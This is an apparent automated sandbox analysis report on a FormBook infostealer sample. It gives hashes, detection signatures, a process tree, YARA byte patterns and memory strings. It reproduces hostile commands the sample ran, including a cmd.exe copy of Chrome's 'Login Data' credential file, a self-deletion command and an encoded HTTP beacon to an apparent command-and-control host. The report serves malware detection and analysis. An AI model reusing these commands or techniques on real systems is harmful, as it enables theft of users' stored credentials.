
Analysis Report ewuTygg1Bw.exe

Overview

General Information

Sample Name: ewuTygg1Bw.exe
MD5: 0060b9cfb3b239c92f18f3b1ae7d8c3c
SHA1: 7170ef2a931341c0c4fb152c1552a5049eca68ae
SHA256: bb973839df53081c969a7e6647bdfc2d3090b43b496fe8e2244a51a604264112

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • ewuTygg1Bw.exe (PID: 5096 cmdline: 'C:\Users\user\Desktop\ewuTygg1Bw.exe' MD5: 0060B9CFB3B239C92F18F3B1AE7D8C3C)
    • ewuTygg1Bw.exe (PID: 724 cmdline: {path} MD5: 0060B9CFB3B239C92F18F3B1AE7D8C3C)
      • explorer.exe (PID: 2856 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • cscript.exe (PID: 5028 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 400 cmdline: /c del 'C:\Users\user\Desktop\ewuTygg1Bw.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2772 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • vgaot707b.exe (PID: 2492 cmdline: C:\Program Files (x86)\Iobk\vgaot707b.exe MD5: 0060B9CFB3B239C92F18F3B1AE7D8C3C)
          • vgaot707b.exe (PID: 1540 cmdline: {path} MD5: 0060B9CFB3B239C92F18F3B1AE7D8C3C)
        • autochk.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 67DFCAFAAD1B556C7731CDFDD4F4B803)
        • raserver.exe (PID: 3100 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source | Rule | Description | Author | Strings
18.2.vgaot707b.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
18.2.vgaot707b.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
18.2.vgaot707b.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.2.vgaot707b.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
18.2.vgaot707b.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x17649:$sqlite3step: 68 34 1C 7B E1
  • 0x1775c:$sqlite3step: 68 34 1C 7B E1
  • 0x17678:$sqlite3text: 68 38 2A 90 C5
  • 0x1779d:$sqlite3text: 68 38 2A 90 C5
  • 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x177b3:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview


System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started
Author: Joe Security
Data:
  Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\cmd.exe
  NewProcessName: C:\Windows\SysWOW64\cmd.exe
  OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: C:\Windows\SysWOW64\cscript.exe
  ParentImage: C:\Windows\SysWOW64\cscript.exe
  ParentProcessId: 5028
  ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  ProcessId: 2772

Signature Overview


AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Iobk\vgaot707b.exe | Virustotal: Detection: 36%
Multi AV Scanner detection for submitted file
Source: ewuTygg1Bw.exe | Virustotal: Detection: 36%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Iobk\vgaot707b.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ewuTygg1Bw.exe | Joe Sandbox ML: detected
Source: 18.2.vgaot707b.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 4x nop then pop ebx | 2_2_00407A77
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 4x nop then pop ebx | 2_2_00407A88
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 4x nop then pop edi | 2_2_0040E582
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 4x nop then pop edi | 2_2_00417D93
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop ebx | 6_2_02DA7A88
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop ebx | 6_2_02DA7A77
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi | 6_2_02DB7D93
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi | 6_2_02DAE582
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 4x nop then pop ebx | 18_2_00407A77
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 4x nop then pop ebx | 18_2_00407A88
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 4x nop then pop edi | 18_2_0040E582
Source: C:\Program Files (x86)\Iobk\vgaot707b.exe | Code function: 4x nop then pop edi | 18_2_00417D93

Source: global traffic | HTTP traffic detected:
  GET /4vx/?T4s=JVdfqtShaZLEdrfPMUiD2srIZ4Eny+NoRWx7/Ra+VhS0efzYbtMJqhi2JVU5dyBSSoIe&GlTD=Q87p3Xr0bF8LO HTTP/1.1
  Host: www.longfellowpurebreds.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (empty)
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: unknown | DNS traffic detected: queries for: www.diamond-distinction.com
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: explorer.exe, 00000003.00000000.438142137.0000000003350000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: cscript.exe, 00000006.00000002.832648097.00000000002A8000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/ocid=iehpm3
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmp | String found in binary or memory: https://www.msn.com/content/images/icons/Favi
Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmp | String found in binary or memory: https://www.msn.com/spartan/ientplocale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1&

E-Banking Fraud:

Yara detected FormBook (same Yara match sources as listed under AV Detection)

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\cscript.exe | Dropped file: C:\Users\user\AppData\Roaming\983-T328\983logri.ini
Source: C:\Windows\SysWOW64\cscript.exe | Dropped file: C:\Users\user\AppData\Roaming\983-T328\983logrf.ini
Source: C:\Windows\SysWOW64\cscript.exe | Dropped file: C:\Users\user\AppData\Roaming\983-T328\983logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Windows\SysWOW64\cscript.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 2_2_00419850 NtCreateFile
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 2_2_00419900 NtReadFile
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 2_2_00419980 NtClose
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 2_2_00419A30 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 2_2_004198FA NtReadFile
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 2_2_0041997A NtClose
Source: C:\Users\user\Desktop\ewuTygg1Bw.exe | Code function: 2_2_00419A2C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A480 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480ACE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A410 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A470 NtSetInformationFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A540 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A560 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A6A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A610 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A750 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A800 NtSetValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A2D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A240 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A260 NtWriteFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A3D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A3E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A310 NtEnumerateValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A350 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A360 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A4A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480B410 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A430 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A460 NtOpenProcess
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480B470 NtOpenThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A5A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A5F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A520 NtEnumerateKey
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480BD40 NtSuspendThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A6D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A650 NtQueueApcThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A780 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A700 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A710 NtQuerySection
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A720 NtResumeThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480B0B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A2F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A220 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480BA30 NtSetContextThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_0480A370 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_02DB9A30 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_02DB9850 NtCreateFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_02DB9980 NtClose
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_02DB9900 NtReadFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_02DB9A2C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_02DB98FA NtReadFile
